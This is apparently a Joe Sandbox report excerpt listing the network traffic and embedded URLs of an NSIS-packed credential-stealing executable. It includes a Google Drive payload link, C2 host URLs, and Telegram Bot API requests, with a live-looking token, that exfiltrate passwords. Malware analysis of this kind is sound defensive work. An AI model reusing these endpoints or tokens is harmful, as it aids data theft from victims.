            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:103386%0D%0ADate%20and%20Time:%2015/02/2025%20/%2000:56:21%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20103386%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7809339088:AAEUtMa_u0dd_zBfAWh2Ah2az4h6hNs_Wg0/sendDocument?chat_id=7618581100&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd4dbcb03dbc38Host: api.telegram.orgContent-Length: 581
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
            Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
            Source: Joe Sandbox ViewIP Address: 158.101.44.242 158.101.44.242
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49742 -> 158.101.44.242:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49739 -> 158.101.44.242:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49737 -> 216.58.206.78:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49741 -> 104.21.32.1:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1es5vHQSxsZ5VTyJjIIWEcmn6UO_kGzRz HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1es5vHQSxsZ5VTyJjIIWEcmn6UO_kGzRz&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49740 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1es5vHQSxsZ5VTyJjIIWEcmn6UO_kGzRz HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1es5vHQSxsZ5VTyJjIIWEcmn6UO_kGzRz&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:103386%0D%0ADate%20and%20Time:%2015/02/2025%20/%2000:56:21%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20103386%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: unknownHTTP traffic detected: POST /bot7809339088:AAEUtMa_u0dd_zBfAWh2Ah2az4h6hNs_Wg0/sendDocument?chat_id=7618581100&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd4dbcb03dbc38Host: api.telegram.orgContent-Length: 581
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 14 Feb 2025 19:00:51 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
            Source: Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2954634470.0000000032F11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
            Source: Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2954634470.0000000032D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
            Source: Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2954634470.0000000032D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
            Source: Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2954634470.0000000032F11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2954634470.0000000032D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2954634470.0000000032D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000003.2116956747.0000000002747000.00000004.00000020.00020000.00000000.sdmp, Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000003.2151781920.0000000002747000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
            Source: Justificante67ab404ffe31b359e00a499e656454545.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
            Source: Justificante67ab404ffe31b359e00a499e656454545.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2954634470.0000000032D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2954634470.0000000032D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
            Source: Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000003.2116956747.0000000002747000.00000004.00000020.00020000.00000000.sdmp, Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000003.2151781920.0000000002747000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
            Source: Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2955805059.000000003405A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2954634470.0000000032E75000.00000004.00000800.00020000.00000000.sdmp, Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2954634470.0000000032F11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2954634470.0000000032F11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2954634470.0000000032E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
            Source: Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2954634470.0000000032E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:103386%0D%0ADate%20a
            Source: Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2954634470.0000000032F11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7809339088:AAEUtMa_u0dd_zBfAWh2Ah2az4h6hNs_Wg0/sendDocument?chat_id=7618
            Source: Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000003.2116956747.0000000002747000.00000004.00000020.00020000.00000000.sdmp, Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000003.2117019130.000000000277E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2955805059.000000003405A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2955805059.000000003405A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2955805059.000000003405A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2954634470.0000000032F53000.00000004.00000800.00020000.00000000.sdmp, Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2954634470.0000000032F84000.00000004.00000800.00020000.00000000.sdmp, Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2954634470.0000000032E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
            Source: Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2932166073.00000000026D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2932166073.00000000026D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/G
            Source: Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2953955469.0000000031F20000.00000004.00001000.00020000.00000000.sdmp, Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2932166073.0000000002716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1es5vHQSxsZ5VTyJjIIWEcmn6UO_kGzRz
            Source: Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000003.2152915214.000000000277F000.00000004.00000020.00020000.00000000.sdmp, Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2932166073.000000000272E000.00000004.00000020.00020000.00000000.sdmp, Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000003.2151781920.0000000002747000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2932166073.000000000272E000.00000004.00000020.00020000.00000000.sdmp, Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000003.2151781920.0000000002747000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/C0l
            Source: Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000003.2116956747.0000000002747000.00000004.00000020.00020000.00000000.sdmp, Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2932166073.000000000272E000.00000004.00000020.00020000.00000000.sdmp, Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000003.2117019130.000000000277E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1es5vHQSxsZ5VTyJjIIWEcmn6UO_kGzRz&export=download
            Source: Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2955805059.000000003405A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2955805059.000000003405A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2955805059.000000003405A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2954634470.0000000032E4D000.00000004.00000800.00020000.00000000.sdmp, Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2954634470.0000000032E75000.00000004.00000800.00020000.00000000.sdmp, Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2954634470.0000000032DDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2954634470.0000000032DDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2954634470.0000000032DDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
            Source: Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2954634470.0000000032E4D000.00000004.00000800.00020000.00000000.sdmp, Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2954634470.0000000032E07000.00000004.00000800.00020000.00000000.sdmp, Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2954634470.0000000032E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
            Source: Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000003.2116956747.0000000002747000.00000004.00000020.00020000.00000000.sdmp, Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000003.2117019130.000000000277E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2955805059.0000000033EB6000.00000004.00000800.00020000.00000000.sdmp, Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2955805059.0000000033E69000.00000004.00000800.00020000.00000000.sdmp, Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2955805059.000000003405A000.00000004.00000800.00020000.00000000.sdmp, Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2955805059.0000000033EDE000.00000004.00000800.00020000.00000000.sdmp, Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2955805059.000000003410F000.00000004.00000800.00020000.00000000.sdmp, Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2954634470.0000000032E9A000.00000004.00000800.00020000.00000000.sdmp, Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2955805059.000000003400D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
            Source: Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2955805059.0000000034013000.00000004.00000800.00020000.00000000.sdmp, Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2955805059.00000000340EB000.00000004.00000800.00020000.00000000.sdmp, Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2955805059.0000000033E6F000.00000004.00000800.00020000.00000000.sdmp, Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2955805059.0000000033EB9000.00000004.00000800.00020000.00000000.sdmp, Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2955805059.0000000033FE8000.00000004.00000800.00020000.00000000.sdmp, Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2955805059.0000000033E44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
            Source: Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2955805059.0000000033EB6000.00000004.00000800.00020000.00000000.sdmp, Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2955805059.0000000033E69000.00000004.00000800.00020000.00000000.sdmp, Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2955805059.000000003405A000.00000004.00000800.00020000.00000000.sdmp, Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2955805059.0000000033EDE000.00000004.00000800.00020000.00000000.sdmp, Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2955805059.000000003410F000.00000004.00000800.00020000.00000000.sdmp, Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2954634470.0000000032E9A000.00000004.00000800.00020000.00000000.sdmp, Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2955805059.000000003400D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
            Source: Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2955805059.0000000034013000.00000004.00000800.00020000.00000000.sdmp, Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2955805059.00000000340EB000.00000004.00000800.00020000.00000000.sdmp, Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2955805059.0000000033E6F000.00000004.00000800.00020000.00000000.sdmp, Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2955805059.0000000033EB9000.00000004.00000800.00020000.00000000.sdmp, Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2955805059.0000000033FE8000.00000004.00000800.00020000.00000000.sdmp, Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2955805059.0000000033E44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
            Source: Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2955805059.000000003405A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000003.2116956747.0000000002747000.00000004.00000020.00020000.00000000.sdmp, Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000003.2117019130.000000000277E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000003.2116956747.0000000002747000.00000004.00000020.00020000.00000000.sdmp, Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000003.2117019130.000000000277E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2955805059.000000003405A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000003.2116956747.0000000002747000.00000004.00000020.00020000.00000000.sdmp, Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000003.2117019130.000000000277E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000003.2116956747.0000000002747000.00000004.00000020.00020000.00000000.sdmp, Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000003.2117019130.000000000277E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2954634470.0000000032F84000.00000004.00000800.00020000.00000000.sdmp, Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2954634470.0000000032E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
            Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
            Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
            Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
            Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.4:49737 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.184.225:443 -> 192.168.2.4:49738 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49773 version: TLS 1.2
